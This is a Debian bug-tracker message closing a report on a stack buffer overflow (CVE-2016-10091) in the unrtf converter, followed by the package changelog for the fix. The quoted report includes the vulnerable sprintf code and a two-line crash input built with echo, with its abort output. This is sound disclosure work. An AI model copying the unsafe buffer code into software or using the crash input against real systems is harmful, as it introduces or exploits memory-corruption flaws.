Bug#849705: marked as done (unrtf: CVE-2016-10091: stack-based buffer overflows in cmd_* functions)

Fri, 06 Jan 2017 15:36:38 -0800 

Your message dated Fri, 06 Jan 2017 23:32:13 +0000
with message-id <[email protected]>
and subject line Bug#849705: fixed in unrtf 0.21.5-3+deb8u1
has caused the Debian Bug report #849705,
regarding unrtf: CVE-2016-10091: stack-based buffer overflows in cmd_* functions
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)


-- 
849705: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=849705
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message --- 
Package: unrtf
Version: 0.21.9-clean-2

I've found a Stack-based buffer overflow in unrtf 0.21.9, which affects three 
functions including: cmd_expand, cmd_emboss and cmd_engrave.

# convert.c

static int
cmd_expand (Word *w, int align, char has_param, int param) {
char str[10];
if (has_param) {
sprintf(str, "%d", param/4); // Overflow, 9-digit negative value triggers the 
bug
if (!param)
attr_pop(ATTR_EXPAND);
else
attr_push(ATTR_EXPAND, str);
}
return FALSE;
}

Apparently writing a negative integer to the buffer can trigger the overflow 
(Minus sign needs an extra byte).

* How to trigger the bug *

$ echo "\expnd-400000000" > poc
$ unrtf poc

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<!-- Translation from RTF performed by UnRTF, version 0.21.9 -->
*** buffer overflow detected ***: unrtf terminated
======= Backtrace: =========
/lib/i386-linux-gnu/libc.so.6(+0x6737a)[0xb764f37a]
/lib/i386-linux-gnu/libc.so.6(__fortify_fail+0x37)[0xb76dfe07]
/lib/i386-linux-gnu/libc.so.6(+0xf60a8)[0xb76de0a8]
/lib/i386-linux-gnu/libc.so.6(+0xf58b8)[0xb76dd8b8]
/lib/i386-linux-gnu/libc.so.6(_IO_default_xsputn+0xa6)[0xb7653bf6]
/lib/i386-linux-gnu/libc.so.6(_IO_vfprintf+0xf66)[0xb762b1d6]
/lib/i386-linux-gnu/libc.so.6(__vsprintf_chk+0x90)[0xb76dd950]
/lib/i386-linux-gnu/libc.so.6(__sprintf_chk+0x20)[0xb76dd8a0]
unrtf[0x804c7b8]
unrtf[0x804f77d]
unrtf[0x804f9e7]
unrtf[0x804920b]
/lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf6)[0xb7600276]
unrtf[0x804953c]
======= Memory map: ========
08048000-0805b000 r-xp 00000000 08:01 405354 /usr/bin/unrtf
0805b000-0805c000 r--p 00012000 08:01 405354 /usr/bin/unrtf
0805c000-0805d000 rw-p 00013000 08:01 405354 /usr/bin/unrtf
0805d000-08085000 rw-p 00000000 00:00 0
0952d000-0954e000 rw-p 00000000 00:00 0 [heap]
b75ca000-b75e6000 r-xp 00000000 08:01 393233 
/usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e6000-b75e7000 r--p 0001b000 08:01 393233 
/usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e7000-b75e8000 rw-p 0001c000 08:01 393233 
/usr/lib/i386-linux-gnu/libgcc_s.so.1
b75e8000-b7799000 r-xp 00000000 08:01 395818 
/usr/lib/i386-linux-gnu/libc-2.24.so
b7799000-b779b000 r--p 001b0000 08:01 395818 
/usr/lib/i386-linux-gnu/libc-2.24.so
b779b000-b779c000 rw-p 001b2000 08:01 395818 
/usr/lib/i386-linux-gnu/libc-2.24.so
b779c000-b779f000 rw-p 00000000 00:00 0
b77a3000-b77a6000 rw-p 00000000 00:00 0
b77a6000-b77a8000 r--p 00000000 00:00 0 [vvar]
b77a8000-b77aa000 r-xp 00000000 00:00 0 [vdso]
b77aa000-b77cc000 r-xp 00000000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
b77cc000-b77cd000 rw-p 00000000 00:00 0
b77cd000-b77ce000 r--p 00022000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
b77ce000-b77cf000 rw-p 00023000 08:01 393914 /usr/lib/i386-linux-gnu/ld-2.24.so
bf992000-bf9b3000 rw-p 00000000 00:00 0 [stack]
Aborted

* Test environment *

Linux debian 4.7.0-1-686-pae #1 SMP Debian 4.7.8-1 (2016-10-19) i686 GNU/Linux
libc6 2.24-8

Regards,
Amir


Sent with [ProtonMail](https://protonmail.com) Secure Email.

--- End Message ---
--- Begin Message --- 
Source: unrtf
Source-Version: 0.21.5-3+deb8u1

We believe that the bug you reported is fixed in the latest version of
unrtf, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Willi Mann <[email protected]> (supplier of updated unrtf package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Sun, 01 Jan 2017 19:50:41 +0100
Source: unrtf
Binary: unrtf
Architecture: source amd64
Version: 0.21.5-3+deb8u1
Distribution: stable
Urgency: medium
Maintainer: Willi Mann <[email protected]>
Changed-By: Willi Mann <[email protected]>
Description:
 unrtf      - RTF to other formats converter
Closes: 849705
Changes:
 unrtf (0.21.5-3+deb8u1) stable; urgency=medium
 .
   * Add patch from upstream to fix CVE-2016-10091 (buffer overflow in various
     cmd_ functions) closes: 849705
Checksums-Sha1:
 b509b150de60c9ea4cd2924d3d0c72c7e80ed43c 1857 unrtf_0.21.5-3+deb8u1.dsc
 c44ba70275788c1d47617f794e8a7ef40cc7d0a7 10988 
unrtf_0.21.5-3+deb8u1.debian.tar.xz
 4eb6408e75f074ebdd4553bf7c6edb5cef7232f7 44032 unrtf_0.21.5-3+deb8u1_amd64.deb
Checksums-Sha256:
 e3411332e5d511682834157b2e9b2d84cb5a13212fb1efe3563160c7c1aab14c 1857 
unrtf_0.21.5-3+deb8u1.dsc
 0dbdd48df60e78b89f986961782ddf7f6dfdd329d78f466bdcce1fbbff5ef958 10988 
unrtf_0.21.5-3+deb8u1.debian.tar.xz
 d7c677d1d55ae92f320a7db1eefe7bbe43b247b6db360590187a087bcb0a07be 44032 
unrtf_0.21.5-3+deb8u1_amd64.deb
Files:
 3e9b9131efa684f034fe804d4c6f1e09 1857 text optional unrtf_0.21.5-3+deb8u1.dsc
 69ad47869f3577110567de89ee81529c 10988 text optional 
unrtf_0.21.5-3+deb8u1.debian.tar.xz
 e489a0afa8939a5322355bbea998104e 44032 text optional 
unrtf_0.21.5-3+deb8u1_amd64.deb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJYb0hwAAoJEIy+IZx0V22BmcgP/RD3IaV9esHlLKBTVRvIBXvK
XET+XgSZbUrvjZ3oPT2aXK03mhFOg1QF1yszGQHkqbGM4GIjT8koxJOM2pw1Yxlp
i111KZD8FsvLRgMAaehr9PRb7Z8N/2F8CLFu+6LTowMzRfRbT4DZErIWcBlXFsxF
C7wIE9aszAwYZHEC6QhlQf7RMN0bcwBSLAaqijlqx2pMulDsCzFCv/WNmaMyNxuw
F5A3vvhuTF2OF6BCmG1PuBl/4O/igFYYwyN0IrN3hPQAu/tOGoKMCzTV5fp/CQqn
Dbz+QNrRC8bV8I0BwX+ZQtGBRor/4NdcbOXT17rbz/ogCNLkFkhwezL+kjO40fRO
mhcxYgKIeWPniJ7tYSUg68a34yj1lgQ2na8W7N+22cLoz14THjnOdJa+e6Hx8CyW
dKZFPss3m42NbxR73oLMxHEz0NGlFCebvkNJhYtT6Aw7aR3rzwcax5Au9EgyHMV4
/bJMLmE0QwoDBIv7BY9bMFXzhfP1Zm40v9Y1OzCCIXy4y/wVpBgUZXKL9QGVyPZU
z6GCNwmVVrsx1PfS1T/X4mnaz7DZbbIKC51cr8uQ/DE4I+0g+7XB05avoBh9o5Ar
Lm4HZsdMr06PfsvzD4ZoUEuew+/uhb7kCYLrnAr5/pj498RRsemNyeXuMxRxCmEW
hCSIM/+/Qdyej+MuRSMo
=vxM5
-----END PGP SIGNATURE-----

--- End Message ---

Reply via email to